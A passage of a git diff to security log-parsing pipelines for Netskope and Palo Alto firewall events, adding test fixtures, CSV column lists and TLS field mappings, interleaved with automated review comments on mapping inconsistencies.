"1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 
48.8323,
+ "lon": 2.4075
+ },
+ "postal_code": "75018",
+ "region_name": "\u00cele-de-France",
+ "timezone": "Europe/Paris"
+ },
+ "ip": "5.6.7.8"
+ },
+ "url": {
+ "original": "test.example.com",
+ "path": "test.example.com"
+ },
+ "user": {
+ "domain": "mail.fr",
+ "email": "john.doe@mail.fr",
+ "name": "john.doe"
+ },
+ "user_agent": {
+ "name": "Chrome"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json
index 25513a172..412ece514 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_log.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_log.json
@@ -17,6 +17,9 @@
 ]
 },
 "@timestamp": "2022-12-21T15:52:00Z",
+ "action": {
+ "name": "Allow"
+ },
 "cloud": {
 "instance": {
 "id": "Example"
@@ -43,7 +46,8 @@
 "md5": "68b329da9893e34099c7d8ad5cb9c940"
 },
 "mime_type": "image/gif",
- "name": "giphy2.gif"
+ "name": "giphy2.gif",
+ "size": 204299
 },
 "host": {
 "name": "TEST-1111111",
diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json
new file mode 100644
index 000000000..314e7d7e1
--- /dev/null
+++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json
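Review bot: the expected output of test_nspolicy_block.json omits `dstport: 443` (no `destination.port`) and the `ja3` fingerprint (ECS `tls.client.ja3`), although both are present in the raw event and are the attributes an analyst would pivot on when reviewing a DoH block; the new fixture locks that gap in. `url.path` is also pinned to the bare hostname `test.example.com` with no `url.domain`, which reads like the `url` value being treated as a path. These may be pre-existing parser behaviours rather than regressions from this commit, but a new fixture is the place to assert the intended mapping (`"port": 443` under `destination`, `"domain": "test.example.com"` under `url`) rather than the current one. The file also ends without a trailing newline.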
@@ -0,0 +1,123 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; 
DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + 
"dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template
\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": 
"url.app.com/object2.txt" + }, + "user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type 
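Review bot: The expected `file.mime_type` in this fixture is `File Type Not Detected`, which is the Netskope `file_type` label rather than a media type, while the same input message carries `data_type` = `application/octet-stream`; if the Netskope parser (outside this diff) maps file_type into file.mime_type, this fixture locks a non-MIME value into an ECS field that consumers filter on. The expected `user_agent.version` likewise copies the raw `6.0;` with its trailing semicolon. Both are fixture expectations, so the correction belongs in the parser, with this file updated alongside it.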
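Review bot: The `paloalto.vsys` description is changed from `The virtual system` to `the virtual system`, which reads as an accidental edit and breaks the capitalised style of the three `paloalto.tls.*` descriptions added just above it; keep `description: The virtual system`. For `paloalto.tls.chain_status` and `paloalto.tls.root_status` the description could also name the observed value set, e.g. `description: Trust status of the server certificate chain as reported by the firewall (e.g. Trusted, Uninspected)`, since the fixtures in this commit show those exact strings.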
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
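Review bot: This list names column 7 `GeneratedTime`, while the HIPMATCH and DECRYPTION lists added later in this commit name the same position `GenerateTime`; any stage that reads one spelling silently misses the other log type. Pick one spelling across all column lists, e.g. `- GenerateTime` here, so a single `or`-chain in the mapping stages covers every format.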
@@ -382,6 +382,167 @@ pipeline:
 - HighResolutionTimestamp
 delimiter: ","
 
+ # HIPMATCH CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceUser
+ - VirtualLocation
+ - MachineName
+ - EndpointOSType
+ - SourceAddress
+ - HipMatchName
+ - RepeatCount
+ - HIPMatchType
+ - FUTURE_USE
+ - FUTURE_USE
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - SourceIPv6
+ - HostID
+ - EndpointSerialNumber
+ - SourceDeviceMac
+ - HighResolutionTimestamp
+ - ClusterName
+ delimiter: ","
+
+ # DECRYPTION CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceAddress
+ - DestinationAddress
+ - NATSourceIP
+ - NATDestinationIP
+ - Rule
+ - SourceUser
+ - DestinationUser
+ - Application
+ - VirtualLocation
+ - SourceZone
+ - DestinationZone
+ - InboundInterface
+ - OutboundInterface
+ - LogAction
+ - TimeLogged
+ - SessionID
+ - RepeatCount
+ - SourcePort
+ - DestinationPort
+ - NATSourcePort
+ - NATDestinationPort
+ - Flags
+ - IPProtocol
+ - Action
+ - Tunnel
+ - FUTURE_USE
+ - FUTURE_USE
+ - SourceVMUUID
+ - DestinationVMUUID
+ - UUIDforrule
+ - StageforClienttoFirewall
+ - StageforFirewalltoServer
+ - TLSVersion
+ - TLSKeyExchange
+ - TLSEncryptionAlgorithm
+ - TLS_AUTH
+ - PolicyName
+ - EllipticCurve
+ - ErrorIndex
+ - RootStatus
+ - ChainStatus
+ - ProxyType
+ - CertificateSerialNumber
+ - Fingerprint
+ - CertificateStartDate
+ - CertificateEndDate
+ - CertificateVersion
+ - CertificateSize
+ - CommonNameLength
+ - IssuerCommonNameLength
+ - RootCommonNameLength
+ - SNILength
+ - CertificateFlags
+ - SubjectCommonName
+ - IssuerSubjectCommonName
+ - RootSubjectCommonName
+ - ServerNameIndication
+ - Error
+ - ContainerID
+ - PODNamespace
+ - PODName
+ - SourceExternalDynamicList
+ - DestinationExternalDynamicList
+ - SourceDynamicAddressGroup
+ - DestinationDynamicAddressGroup
+ - HighResTimestamp
+ - SourceDeviceCategory
+ - SourceDeviceProfile
+ - SourceDeviceModel
+ - SourceDeviceVendor
+ - SourceDeviceOSFamily
+ - SourceDeviceOSVersion
+ - SourceHostname
+ - SourceMACAddress
+ - DestinationDeviceCategory
+ - DestinationDeviceProfile
+ - DestinationDeviceModel
+ - DestinationDeviceVendor
+ - DestinationDeviceOSFamily
+ - DestinationDeviceOSVersion
+ - DestinationHostname
+ - DestinationMACAddress
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - ApplicationSubcategory
+ - ApplicationCategory
+ - ApplicationTechnology
+ - ApplicationRisk
+ - ApplicationCharacteristic
+ - ApplicationContainer
+ - ApplicationSaaS
+ - ApplicationSanctionedState
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
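Review bot: The DECRYPTION list names column 73 `HighResTimestamp`, while the HIPMATCH list and the existing context line use `HighResolutionTimestamp`; a timestamp stage keyed on the latter (outside this hunk) would not see it, and the test_decryption_csv fixture indeed expects `@timestamp` 2024-11-03T19:09:43Z although the message carries `2024-11-03T19:09:43.654+01:00` (18:09:43.654Z), whereas the HIPMATCH fixture converts its offset correctly. Renaming the column `- HighResolutionTimestamp` would align both log types. In the same fixture the trailing `,,ssl,no,no` lands `ssl` in ApplicationSaaS and `no` in ClusterName, which reads as if a Tunneled Application column is missing between ApplicationContainer and ApplicationSaaS; the tail should be checked against the PAN-OS decryption log field order before rules rely on those columns. Finally `TLS_AUTH`, `IssuerSubjectCommonName` and `CertificateSerialNumber` differ from the JSON dialect's `TLSAuth`, `IssuerCommonName` and `CertificateSerial` seen in test_decryption_json, so each `tls.*` template needs an `or` for both spellings unless the CSV columns reuse the JSON names.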
@@ -592,7 +753,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
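Review bot: The HIPMATCH columns added in this commit include `EndpointOSType` (`Windows` in test_hipmatch_csv), but none of the host.os.* lines here read it, so that fixture ends with host.id and host.name and no host.os at all. ECS os.family takes values such as `windows`, so `host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily or parsed_event.message.EndpointOSType}}"` would surface it, provided the field really is an OS family name (its value set is not visible here). The enclosing set stage starts and ends outside the hunk.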
@@ -608,6 +769,13 @@ stages:
 network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
 network.protocol: "{{parsed_description.message.proto}}"
 network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
 observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
 observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
 observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -617,7 +785,7 @@ stages:
 observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
 observer.serial_number: "{{parsed_event.message.DeviceSN}}"
 observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
 rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
 source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
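Review bot: `tls.cipher` reads `parsed_event.message.message.TLS_AUTH` — `.message.` is doubled — so the suffix can never resolve, and neither new decryption fixture expects a tls.cipher even though both messages carry ECDHE, AES_256_GCM and SHA384, which is consistent with the expression failing or rendering incomplete. The CSV column is `TLS_AUTH` but the JSON dialect key is `TLSAuth`, so the corrected lookup needs both, and `TLS_ECDHE_AES_256_GCM_SHA384` is not an IANA cipher-suite name (no authentication algorithm, no `WITH`), so detection rules should not treat this tls.cipher as a registry value. The subject and serial mappings read only the CSV names `SubjectCommonName`/`CertificateSerialNumber`, while test_decryption_json carries `CommonName` and `CertificateSerial` and its expected output has an issuer but no subject or serial; conversely `IssuerCommonName` is the JSON key and the CSV column is `IssuerSubjectCommonName`. Adding the second spelling with `or`, as host.os.version already does earlier in this stage, covers both formats:
```yaml
# … unchanged: tls.version …
tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}"
# … unchanged: tls.curve …
tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName or parsed_event.message.IssuerSubjectCommonName}}"
tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}"
tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}"
# … unchanged: tls.server.hash.sha256, observer.* mappings …
```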
@@ -752,6 +920,9 @@ stages:
 paloalto.vsys: "{{parsed_description.message.vsys}}"
 paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}"
 paloalto.server.profile: "{{parsed_description.message.server_profile}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
 - set:
 paloalto.threat.type: >
 {%- set id = parsed_threat.message.threat_code | int -%}
@@ -810,8 +981,8 @@ stages:
 user.name: '{{final.user.name.split("\\") | last}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
- user.domain: '{{final.user.email.split("@") | first}}'
- user.name: '{{final.user.email.split("@") | last}}'
+ user.domain: '{{final.user.email.split("@") | last}}'
+ user.name: '{{final.user.email.split("@") | first}}'
 filter: '{{final.user.email != null and "@" in final.user.email}}'
 - set:
 source.user.domain: '{{final.source.user.name.split("\\") | first}}'
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
 "name": "AAAABBBBB",
 "os": {
 "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..1d68c400c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
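Review bot: `paloalto.tls.chain_status` and `paloalto.tls.root_status` copy the vendor strings verbatim, and the two fixtures in this commit show mixed casing for the same concept (`Uninspected`/`uninspected` in test_decryption_csv, `Trusted`/`trusted` in test_decryption_json), so keyword matches in detection rules on these fields must anticipate both cases. If that casing is vendor behaviour rather than a sample artefact, consider `paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus | lower}}"` and the same for root_status so the values are predictable; the fixtures would then need updating to the lowercased form.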
@@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json 
